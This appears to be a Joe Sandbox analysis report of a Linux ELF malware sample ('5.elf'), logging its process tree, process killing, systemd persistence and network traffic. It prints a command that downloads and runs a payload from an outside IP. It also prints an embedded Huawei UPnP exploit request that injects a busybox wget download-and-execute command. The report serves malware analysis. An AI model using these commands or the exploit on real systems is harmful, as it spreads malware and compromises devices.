Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
5.elf

Overview

General Information

Sample name:5.elf
Analysis ID:1588850
MD5:40d57a51ffba8151bf851940d0ad367e
SHA1:dd2bbf98840d5cfe68e6cdc660c6c25e4de6dbc9
SHA256:c14f6f5a9f774456aef2319034d9e6b57975164e2bdbf9a4bf178737a3e725c3
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1588850
Start date and time:2025-01-11 06:17:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:5.elf
Detection:MAL
Classification:mal56.spre.evad.linELF@0/3@2/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: 5.elf
Command:/tmp/5.elf
PID:5423
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • 5.elf (PID: 5423, Parent: 5347, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/5.elf
    • 5.elf New Fork (PID: 5436, Parent: 5423)
    • sh (PID: 5436, Parent: 5423, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 5438, Parent: 5436)
      • systemctl (PID: 5438, Parent: 5436, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • 5.elf New Fork (PID: 5442, Parent: 5423)
    • sh (PID: 5442, Parent: 5423, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 5444, Parent: 5442)
      • systemctl (PID: 5444, Parent: 5442, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
  • wrapper-2.0 (PID: 5427, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5428, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5429, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5430, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5431, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5432, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5440, Parent: 5439)
  • snapd-env-generator (PID: 5440, Parent: 5439, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5445, Parent: 1)
  • bash (PID: 5445, Parent: 1, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
    • bash New Fork (PID: 5453, Parent: 5445)
    • sleep (PID: 5453, Parent: 5445, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 10
    • bash New Fork (PID: 5464, Parent: 5445)
    • rm (PID: 5464, Parent: 5445, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/5
    • bash New Fork (PID: 5465, Parent: 5445)
    • wget (PID: 5465, Parent: 5445, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://103.136.41.100/5 -O /tmp/5
    • bash New Fork (PID: 5467, Parent: 5445)
    • chmod (PID: 5467, Parent: 5445, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 /tmp/5
    • bash New Fork (PID: 5468, Parent: 5445)
    • 5 (PID: 5468, Parent: 5445, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/5 .p1
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 5.elfReversingLabs: Detection: 39%
Source: global trafficTCP traffic: 192.168.2.13:56441 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.13:34549 -> 1.1.1.1:53
Source: /bin/bash (PID: 5465)Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5Jump to behavior
Source: /tmp/5.elf (PID: 5423)Socket: 127.0.0.1:23476Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 103.136.41.100Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: 5.42.drString found in binary or memory: http://%d.%d.%d.%d/%s
Source: 5.elf, 5.42.drString found in binary or memory: http://%d.%d.%d.%d/2;
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.drString found in binary or memory: http://103.136.41.100/5
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: 5.42.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 5.42.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5427, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5428, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5429, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5430, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5431, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5432, result: successfulJump to behavior
Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sampleString containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5427, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5428, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5429, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5430, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5431, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5432, result: successfulJump to behavior
Source: classification engineClassification label: mal56.spre.evad.linELF@0/3@2/0
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5423/statusJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5436)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/5.elf (PID: 5442)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /usr/lib/systemd/systemd (PID: 5445)Shell command executed: /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"Jump to behavior
Source: /bin/bash (PID: 5467)Chmod executable: /usr/bin/chmod -> chmod 777 /tmp/5Jump to behavior
Source: /bin/bash (PID: 5464)Rm executable: /usr/bin/rm -> rm -rf /tmp/5Jump to behavior
Source: /bin/sh (PID: 5438)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5444)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /bin/bash (PID: 5465)Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5Jump to behavior
Source: /usr/bin/chmod (PID: 5467)File: /tmp/5 (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
Source: /bin/bash (PID: 5467)Chmod executable with 777: /usr/bin/chmod -> chmod 777 /tmp/5Jump to behavior
Source: /usr/bin/wget (PID: 5465)File written: /tmp/5Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /usr/bin/rm (PID: 5464)File: /tmp/5Jump to behavior
Source: /bin/bash (PID: 5453)Sleep executable: /usr/bin/sleep -> sleep 10Jump to behavior
Source: /tmp/5.elf (PID: 5423)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5427)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5428)Queries kernel information via 'uname': Jump to behavior
Source: /bin/bash (PID: 5445)Queries kernel information via 'uname': Jump to behavior
Source: /tmp/5 (PID: 5468)Queries kernel information via 'uname': Jump to behavior
Source: 5.elf, 5423.1.00005579a3cef000.00005579a3e40000.rw-.sdmpBinary or memory string: yU!/etc/qemu-binfmt/arm
Source: bash, 5468.1.000055d399102000.000055d399253000.rw-.sdmp, 5, 5468.1.000055d399102000.000055d399253000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: 5.elf, 5423.1.00007ffc8cdb6000.00007ffc8cdd7000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/5.elf
Source: 5.elf, 5423.1.00005579a3cef000.00005579a3e40000.rw-.sdmp, bash, 5468.1.000055d399102000.000055d399253000.rw-.sdmp, 5, 5468.1.000055d399102000.000055d399253000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: 5.elf, 5423.1.00007ffc8cdb6000.00007ffc8cdd7000.rw-.sdmp, bash, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp, 5, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: bash, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp, 5, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/5.p1PWD=/LANG=en_US.UTF-8INVOCATION_ID=ea6e6a85720a446fbd5c3f439d3be8feSHLVL=1JOURNAL_STREAM=9:62552PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin_=/tmp/5/tmp/5
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Systemd Service
1
Systemd Service
2
File and Directory Permissions Modification
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System2
Non-Application Layer Protocol
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts11
File Deletion
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media12
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
